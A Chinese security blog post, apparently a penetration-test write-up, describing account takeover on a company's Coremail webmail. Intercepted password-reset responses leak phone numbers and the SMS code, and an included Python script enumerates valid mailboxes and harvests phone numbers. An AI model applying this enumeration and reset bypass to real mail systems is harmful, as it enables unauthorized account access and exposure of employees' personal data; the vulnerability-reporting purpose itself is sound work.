某公司邮件系统的安全检测

目前分析

 

1、地址:https://mail.*****com/coremail/

分析:

登录功能和忘记密码功能;

目前站点是邮箱系统。方向:爆破、逻辑漏洞-密码找回

图片

信息收集

1、google通过域名收集相关网站获取邮箱信息,inur:***

2.经过多个邮箱信息收集,发现邮箱命名规则

密码找回

输入获取到的邮箱,点击获取邮箱的手机号码,并进行 抓放

图片

返回绑定的手机号码,信息泄露,如果失败时返回错误的

图片

在点击 【获取短信内容】,发现有个**code的内容,四位数,可能是验证码,把这个验证码输入进去,成功了。    [是它是它,就是它]

图片

输入验证码,下一步成功了,说明是正确的,重置任意账户邮箱密码

PYTHON可批量获取手机号码

1、收集当前公司员工名字转换成拼音

2、手机公布的邮箱信息

只是简单写一下获取手机号码 判断邮箱用户真实

import requests
import json
'''
通过邮箱转换批量获取手机号码和获取正确的邮箱
'''

headers={
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0',
'Accept': '*/*',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Connection': 'close',
'Origin':'https://mail.******.com',
'Referer':'https://mail.******.com/coremail/changepwd.jsp?uid=',
'Host':'crm.******.com:80',
'Content-Length': '61'
}

def poststrfox():
    name='***name'
    mail=name+'@******.com'
    data = {
        'mail': mail,
        'lyPass': 'q76a5e96JIQwRMqTTtzWMA=='
    }

    url='https://crm.******.com:80/getPhone'
    req = requests.port(url=url,data=data,headers=headers)
    rtext = req.text
    dic_jsdict = json.loads(rtext)  #返回的是json格式的,所以需要转换一下
    message = dic_jsdict['message']
    print(message, '|', mail)

    poststrfox()

危害/修复:

1、可以爆破获取用户名

2、通过用户可以获取手机号码,信息泄露

3、可以重置任意账户邮箱密码,包括高管的邮箱手机号码,获取邮箱权限,可干的事情很多,钓鱼等。

修复建议

升级当前邮件系统

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值